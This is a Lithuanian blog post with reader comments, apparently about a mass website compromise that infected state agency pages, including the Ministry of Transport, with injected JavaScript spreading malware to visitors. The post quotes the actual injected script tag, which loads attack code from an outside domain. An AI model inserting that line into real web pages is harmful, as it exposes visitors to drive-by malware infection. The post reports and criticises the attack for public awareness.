RSS
Loading ...
(Įvertinimai: 8. Vidutinis balas: 4.88 iš 5 galimų. Įvertink ir Tu.)
Loading ...Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. 
Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.
Tarp laimingųjų pateko ir Susisiekimo ministerija, ir policijos komisariatas, o pažiurėję žemiau rasite ir tinklalapius ministraspirmininkas.lt, bonumpublicum.lt, 5ci.lt, books.lt ir t.t. 5ci tai turbūt kiek puslapių turėjo, tai visus ir nulaužė. 
Tačiau nei vienas nesugebėjo net tyliai pasakyti ką nors panašaus į “Mieli mūsų tinklalapio lankytojai, nepykit, kad užkrėtėm Jus žalingom programom po Kinijos įsilaužėlių atakos. Nuo žalingų programų galite pasitikrinti taip ir va kaip. O mes prisipažįstame klydę ir kad tai daugiau nepasikartotų darysime taip ir va kaip.” ar kažkaip kitaip įspėti bei atsiprašyti savo lankytojų. O kur atsakomybė prieš kitus? Ypač iš valstybinių įstaigų? Na taip, juk geriau viską susitvarkyti tyliai, gal niekas nieko nepastebės. Bet google’as viską mato. Ir mes irgi matom. O dabar dar turim progą apie tai ir pakalbėti garsiai, ir dar per dantį patraukti…
» Temos: Apie viską, Paieška, Programos
» Žymėtis:
kaip.tik.ten
:: 
topix.lt
:: 
del.icio.us
Įrašo gairės: nulaužti valstybiniai puslapiai www
Privatininkai neišsiduoda, nes galbūt kas nors ims ir pareikalaus kompensacijos (?), o biurokratai ir biudžetininkai tylės, nes jei pripažins, reiškia kažkas tarp jų TURĖS būt kaltas, ir nukentės. Vat ir tyli visi ausis suglaudę.
End-userís turi prisiimti dalį atsakomybės taip pat, argi ne jo kaltė, kad jis naršo su IE, Opera ar FF, kuri neblokuoja Javascriptų? Atėjo laikas visiems viešai ir gražiai pranešti, kad saugesnės naršyklės už FF + NoScript nerasi. Patys XSS, Javascript kirminų kūrėjai seniai tai sakė. Tik dabar reikia tai įdiegti ir paprastam vartotojui. Reikia pratinti, kad atsirinkinėtų kokius skriptus pasileisti puslapyje ir gyventi daug kam bus tikrai ramiau.
P.S. Tai velniškai panašu į eilinius Ron’o eksperimentus Lietuvoj, prieš gerą mėnesį galėjai rast, kai kurių TVS sistemų administratorių prisijungimų vardus ir slaptažodžius..
sacrif, su tavimi sutinku tik iš dalies. Vartotojas turi prisiimti dalį atsakomybės, bet tik tuomet, kai jis naršo ne po oficialius, rimtas organizacijas atstovaujančius tinklalapius. Tokiuose neturi būti nieko (tyčia ar netyčia), kas galėtų paveikti vartotoją. Tai tiesiog yra organizacijos veidas internete.
Jei kalbant tik apie vartotojus, didžiausia problema ir yra ta, kaip tavo minimą supratimą jiems įdiegti. Pasižiūrėk kas gatvėje darosi. Laksto per gatvę kas kaip nori, nors perėja visai šalia. Tai ką apie IT saugumą ir susirūpinimą juo bekalbėti?
Beje, kas tas eilinis Ron’as? Kažkaip neteko apie tokį girdėti. Gal galima plačiau, kas čia vyko maždaug prieš mėnesį?
Ar man taip tik atrodo, ar visi uzkresti puslapiai naudoja viena ir ta pati TVS’a?
Nežinau ar TVS’as tas pats. Ta masinė ataka buvo tik prieš tam tikras technologijas naudojančius tinklalapius. Matau tik tiek, kad buvo pašalinti padariniai, bet ne priežastys. Skylės ir toliau paliktos.
[...] nebespėti darbų, viską dar labiau komplikuoja pasitarimai ir planavimas, kaip juos suspėti. Žinybiniai kompiuteriai tampa kenkėjų botais. Neleiskite vaikų į Susisiekimo ministerijos svetainę. Skaitmeninis sėslumas. Koks skirtumas, [...]
Vo čia tai prasisuko. Beje, ar įmanoma nuo tokių apsisaugot paprastam vartotojui, kuris tikrai neišjunginės javascript ?
[...] Informacijos apsaugos pranešimą? Pasirodo, kartu su Susisiekimo ministerijos serveriu visame pasaulyje masinio antpuolio metu buvo [...]
Tai dabar ir tavo blogas prisiskaiciuos?
Jo, dabar jau ir aš statistiką gerinsiu su šio įrašo tekstu.
Evaldai, Windows Vista pagal idėją tokius išpuolius prieš vartotojus turėtų sutvarkyti. Kai kurios antivirusinės (jei laiku atnaujintos) tokius dalykus irgi gali pagauti.
[...] Užsikrėsti žalingomis programomis Jums padės… Susisiekimo ministerija [...]
[...] bus vieneri metai, bet visą tą laiką jis sėkmingai atnaujinamas. Savaitgalį į jį sudėjau ir paskutinio masinio nulaužimo analizę. Įdomiai ta visa ataka padaryta. Pirmą kartą mokymai truko 2 dienas, po to 3, dabar jau [...]
Kaip paleidžiamas tas kodas? Čia gal kai adminai į > ir < nepakeičia ir dar tą tekstą atvaizduoja? Ar yra kitų būdų tokiam nulaužimui?
Čia gal kai adminai > ir < į & gt ; ir & lt ; nepakeičia ir dar tą tekstą atvaizduoja? Ar yra kitų būdų tokiam nulaužimui?
Atrodo, susisiekimo ministerijoj visiem dzin, nes kaip rado pirma, taip ir dabar google kalną jų adresėlių virusuotų.
Tai kiek suprantu susisiekimo ministerija dar nepanaikino…
[...] tas nulaužimas ne toks akivaizdus ir neaišku ar tai rusų darbas. Pamenat, kažkada rašiau apie nulaužtą Susisiekimo ministerijos tinklalapį ir žalingo kodo platinimą per jį? Dabar tas pats vyksta su http://www.regitra.lt. Vizualiai puslapis [...]
[...] tas nulaužimas ne toks akivaizdus ir neaišku ar tai rusų darbas. Pamenat, kažkada rašiau apie nulaužtą Susisiekimo ministerijos tinklalapį ir žalingo kodo platinimą per jį? Dabar tas pats vyksta su http://www.regitra.lt. Vizualiai puslapis [...]
[...] patogumuelt.lt » Blog Archive » Lietuviškų tinklalapių nulaužinėjimas tęsiasi on Užsikrėsti žalingomis programomis Jums padės… Susisiekimo ministerijaDovydas on Balius tęsiasi. Kiti nulaužti tinklalapiai. (Papildoma nuolat). [...]
as vienas is tu kurys pashalino ta shudina javascripta is keliu php puslapiu tvs’e. NIHRENA CIA NERA XSS ATAKA. atsibuskit: jeigu tai butu xss’as jisai butu 100% patalpintas ne html puslapio gale. asmeniskai va ka ishsiaskinau:
tie keli php puslapiai buvo modifikuoti rankiniu budu, turiu omeni kad butu prisijungta prie ftp ir nahaliskai modifikuoti fajlai. domaino savininkas is kurio atejna virusuotas js’as yra RUSISKAS hostas. vis manau kad cia yra raudonos atakos tesinys. beto hostingas tai buvo hostex =)
vistiek as nesuprasiu kaip galima kad ir ddosinta serveri priverst atlikt belenkokias komandas. kad jisai ten naher ir sprogtu nu TIKRAI niekaip neimanoma isgauti slaptazodzius is serverio jeigu tik pats kazko nepasirupinai. butu mano valia isvis pasiekus tam tikro pvz 90% apkrovos iskart sustapdyciau kaip minimum: ssh, http://ftp. per web uzklausas tikrai NIEKAIP negautu passwordu is db. nebent as nzn kokios nors moxlines fantastikos.